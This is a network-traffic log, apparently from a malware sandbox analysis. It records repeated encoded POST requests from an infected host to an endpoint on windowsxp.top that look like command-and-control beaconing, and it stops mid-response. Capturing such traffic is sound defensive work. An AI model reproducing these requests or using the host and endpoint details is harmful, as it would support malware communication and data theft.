                                                                                                                  Oct 27, 2024 19:24:11.823554993 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:12.024328947 CET  768                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ldQPGUSPMkKqdTIblfnwMqyWih9PM7gKNJxiTffKaZ5nmKsjCYP8S%2FWFzdDi15ydY6YRiYmwjn69CxjLMYgEArLFPcYtIwOSDMjUYr6jVgUnkUYQKD8zhgEiUD5ZMbq"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8b98b536b44-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1118&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1355805&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  96          192.168.2.4  50109        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:12.157521963 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:12.508647919 CET  1012               OUT        Data Raw: 50 50 58 5a 5e 5b 56 52 54 58 57 54 54 57 5b 53 59 5b 5b 51 52 53 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PPXZ^[VRTXWTTW[SY[[QRSRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1#59=X56+.4'(-.?)Q7?^--3=/:X:!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:12.752188921 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:13.064238071 CET  779                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDZ5uQTPEQ8%2BU%2F2FF9%2Brnah5CenBOKAnuZKDHtgpreuTP9QWy5dO3B4iIOFR%2BtdzZSeqd9fS%2FSZK07sikmvwIyaCsnMHvqK0uNtUnhK%2FYc%2FpLAfItgWWpIYinK7cXuxU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8bf58a54636-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1923&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=768577&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  97          192.168.2.4  50110        188.114.97.3    80
                                                                                                                  Timestamp                            Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:24:13.187891006 CET  321                OUT        POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:13.542790890 CET  1012               OUT        Data Raw: 50 55 58 5a 5e 53 56 56 54 58 57 54 54 56 5b 53 59 5c 5b 58 52 51 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXZ^SVVTXWTTV[SY\[XRQR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[&?"1^55([.4$<U8>8=/7#;Y;="X,?!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:13.798648119 CET  25                 IN         HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:14.021791935 CET  780                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:13 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tso1GI1FhoWI%2F4LBfagwonB1L%2F1s%2FEsE3O89vRcYWbp407rFlL%2FPl9VbhnV4u1nEuio8s%2Fw%2F7kkOS%2BK9So4CwZETaQRUz4ByhHDlXajZb2l7d9Hth8PyIrD4L4OVPHMD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8c5d94e6c69-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1087&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1376425&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID: 98 | Source IP: 192.168.2.4 | Source Port: 50111 | Destination IP: 188.114.97.3 | Destination Port: 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:13.751929998 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1692
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:14.102468014 CET1692OUTData Raw: 55 5b 58 54 5e 58 53 53 54 58 57 54 54 5d 5b 52 59 5d 5b 59 52 5f 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: U[XT^XSSTXWTT][RY][YR_RST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\'.0[6"&/9$0',.U=,? 2+-.+_=Z.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:14.356313944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:14.560854912 CET | 926 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RNqmp1cEHhwbuQnikZjWWGICzphm%2FBCLVkJOyb2ee1FqtQgZz8%2FGPYWKBdCKRUQieeSSNPIbnaOKKK%2FXCn4HuILM3MTLL1UlA8V%2BUe%2BQuP8zOqV%2B8bJQZTrrDtgNiCN3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8c95c9b4608-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1943&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2013&delivery_rate=743708&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 1a 23 3d 20 56 3d 05 21 1c 29 08 21 58 33 3f 22 00 2f 0c 34 1c 2a 2d 32 0d 2f 2b 3e 54 27 34 31 0b 2b 00 24 11 34 10 2f 0f 3d 0f 21 5e 00 1c 24 03 35 2e 21 50 31 3b 0d 06 30 30 30 16 23 2e 24 07 2a 2d 31 50 28 39 38 5e 28 16 33 17 2c 01 0b 50 25 3a 3d 07 2f 5e 3d 02 3f 00 2a 54 0c 14 22 03 2e 3f 3c 1c 23 31 3e 0a 29 0b 20 1e 24 00 01 0e 33 04 3c 54 3f 12 3b 5e 28 3e 3d 10 22 12 3b 00 28 38 29 05 25 2e 38 05 29 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"#= V=!)!X3?"/4*-2/+>T'41+$4/=!^$5.!P1;000#.$*-1P(98^(3,P%:=/^=?*T".?<#1>) $3<T?;^(>=";(8)%.8)."T")S0YP0


                                                                                                                  Session ID: 99 | Source IP: 192.168.2.4 | Source Port: 50112 | Destination IP: 188.114.97.3 | Destination Port: 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:14.185909033 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:14.540019035 CET1012OUTData Raw: 50 57 58 5b 5b 5f 56 53 54 58 57 54 54 51 5b 5b 59 51 5b 59 52 57 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PWX[[_VSTXWTTQ[[YQ[YRWR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%7":)_!P#.<3',8U=44?-.$)?*.?!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:14.792488098 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:14.998650074 CET | 768 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vP9XgswRyYgthfUD7r5VHGLSuNu41Z2Ur3KlhVpGu7xvcO1j8AWT6ZgDy7N0nYEjB6UdI56iCwRAqrXwVPpF6EmqE70t948dUsuAKVfnigMBuS5HYKj8i4PI8b%2Fkfae0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8cc1fd0469e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1247200&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID: 100 | Source IP: 192.168.2.4 | Source Port: 50113 | Destination IP: 188.114.97.3 | Destination Port: 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:15.125442982 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:15.477507114 CET1012OUTData Raw: 55 57 58 5b 5b 58 56 52 54 58 57 54 54 57 5b 53 59 5f 5b 50 52 50 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWX[[XVRTXWTTW[SY_[PRPRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1?69="^,'/'8#/>,T*; ,=?,9:!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:15.740102053 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:16.048201084 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zepb6qanmgA3N%2F6Pn2N9hAURA8bf60TkCyaGtx%2BPDgKIwaJht0ycUhd0w5lhm8d6DpiqqHd5h%2FCBJaOFpN5Zxt%2FkRBT%2Bybfg%2BaMikwtmI1mGi6yNqZAFcKsfihMeEj9s"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8d1fb1f2d2d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1059253&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID: 101 | Source IP: 192.168.2.4 | Source Port: 50114 | Destination IP: 188.114.97.3 | Destination Port: 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:16.168631077 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:16.526814938 CET1012OUTData Raw: 55 52 58 5a 5b 5e 56 55 54 58 57 54 54 54 5b 5c 59 59 5b 50 52 5f 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: URXZ[^VUTXWTTT[\YY[PR_R_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'&-(_":!!&^9]$;4U/=$T>""/Z-.7=-!Y##X('
                                                                                                                  Oct 27, 2024 19:24:16.759497881 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:16.955605030 CET | 770 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dmZUqI6ObQwBSLjl%2FOrwMHL8R7to76JLy3bWJDas9skwUzdqJMuohwYhfQ7x04yiwmaWuMgpA7TF4CYiqhRqSHzUcWak8GBeJRzGCVTYs1lg%2FjXsXPfvl4KEd8goatZS"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8d859c9e722-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1329&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1124223&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID: 102 | Source IP: 192.168.2.4 | Source Port: 50115 | Destination IP: 188.114.97.3 | Destination Port: 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:17.086993933 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:17.446266890 CET1012OUTData Raw: 50 52 58 5e 5b 58 56 55 54 58 57 54 54 53 5b 5f 59 5e 5b 5c 52 5f 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRX^[XVUTXWTTS[_Y^[\R_RRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.X":&66'.,]'$P-.;*/?"1;[->7=?:9/!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:17.697381020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:17.918967009 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7wNeF9lSFRY%2FUaF9C3T%2BTf5fE6kA3JLu4XqrKJPt7ODB%2FkSJP%2F95mdON6JvFPpYEQx4fpubHZnpb11mZAbPvKUBHdgPInVAkUZm98mK0G0JzfzcvdrO%2FA2DdCt1uWmQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8de39744642-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1056&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1363465&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID: 103 | Source IP: 192.168.2.4 | Source Port: 50116 | Destination IP: 188.114.97.3 | Destination Port: 80
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:24:18.042757034 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:18.399497032 CET1008OUTData Raw: 55 50 5d 5f 5e 5b 56 53 54 58 57 54 54 55 5b 5d 59 59 5b 5c 52 53 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UP]_^[VSTXWTTU[]YY[\RSRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1>(X!*%6[9 0#8-8W=,# 2,'Y>?>_,/!Y##X(
                                                                                                                  Oct 27, 2024 19:24:18.647559881 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:18.838102102 CET | 777 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YYCSDpfqBB01GSiLjmdigh%2B8rmijQoOZ5E1EF4GRxqi5t%2BfTJcIukR5dKh%2Bfi%2FBxWOIw4hjWd2Z3W%2FAUP28OHE5MXOt2XEYNev1ShadAaiNX%2FpQ%2B21TISDIZ%2F2xuC5V"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8e42a626c56-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1231292&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:18.838288069 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
104 | 192.168.2.4 | 50117 | 188.114.97.3 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 19:24:18.966994047 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
Oct 27, 2024 19:24:19.322119951 CET | 1012 | OUT | Data Raw: 55 50 58 5d 5b 59 53 52 54 58 57 54 54 54 5b 5a 59 50 5b 5a 52 51 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UPX][YSRTXWTTT[ZYP[ZRQR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y2.(")%Y66:+3+;8V(,?#88#*<):!Y##X('
Oct 27, 2024 19:24:19.556583881 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 27, 2024 19:24:19.866328955 CET | 771 | IN | HTTP/1.1 200 OK
